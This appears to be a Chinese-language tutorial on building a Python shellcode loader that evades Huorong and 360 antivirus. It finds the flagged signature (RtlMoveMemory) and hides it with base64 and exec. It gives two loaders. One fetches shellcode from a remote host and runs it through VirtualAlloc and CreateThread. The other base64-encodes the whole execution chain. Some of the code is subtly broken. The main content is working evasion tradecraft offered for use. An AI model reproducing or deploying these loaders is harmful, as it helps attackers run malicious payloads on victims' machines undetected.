首先网上找一个加载器
pyinstaller -F -w 1.py
进行打包,使用火绒或者360检测
分步排查
每次增加几行代码,逐步找到特征值
找到特征码
分字符函数进行排查,确定字符RltMoveMemory为特征值
RtlMoveMemory作用为从指定内存中复制内存至另一内存里
此时进行混淆绕过,例如base64,hex等方法
eval函数,只能运行一条语句(火绒查杀),使用exec函数
或者
import ctypes import requests import base64 scode = requests.get("http://192.168.1.1/123.txt") shellcode = bytearray(base64.b64decode(scode.text).decode('hex')) ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = ctypes.c_char * len(shellcode).from_buffer(shellcode) #将base64编码的代码进行解码 func=base64.b64decode(b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ==') exec(func) #执行解码后的代码 exec(base64.b64decode(func)) handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
或者直接base64打包整个shellcode
import ctypes import base64 shellcode = b'' shellcode=base64.b64decode(shellcode) a=base64.b64decode(b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NDtwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSxjdHlwZXMuY19pbnQoMHgzMDAwKSxjdHlwZXMuY19pbnQoMHg0MCkpO2J1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSk7Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKTtoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZChjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX3VpbnQ2NChwdHIpLGN0eXBlcy5jX2ludCgwKSxjdHlwZXMuY19pbnQoMCksY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKSk7Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLGN0eXBlcy5jX2ludCgtMSkp') exec(a)